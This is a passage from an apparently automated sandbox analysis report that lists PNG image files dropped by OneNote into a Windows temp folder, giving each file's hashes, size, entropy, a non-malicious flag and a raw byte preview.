                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A8CF69C1-0C53-4AC5-9B66-BFDE37B3F7CB}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{A9819DBA-30E2-4B09-8C67-71E733E31EC7}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{AB5D0EEB-BD35-4501-B2BC-D8052203B61E}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{AD9AFED0-65CC-42B4-B003-3489DB6C904A}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{ADBEFFE2-0914-485B-82E3-D04D16D881E0}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B0ED4EFD-0A43-4CF9-8E76-E47EC7A924ED}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B0EEBC14-C41B-4734-9C96-F98586213768}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B0F98731-9EE1-4907-8C3D-EEFA869F55A7}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B1F19754-84F9-4C88-BD2F-B23C9F75767F}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B6109B9E-7113-45A1-AD59-A99BE11D6A8B}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{B7C46E47-FC17-4FCD-B699-925FF424A495}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{BA8C9D2E-E482-4B91-8B1F-83C242DDFBBE}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
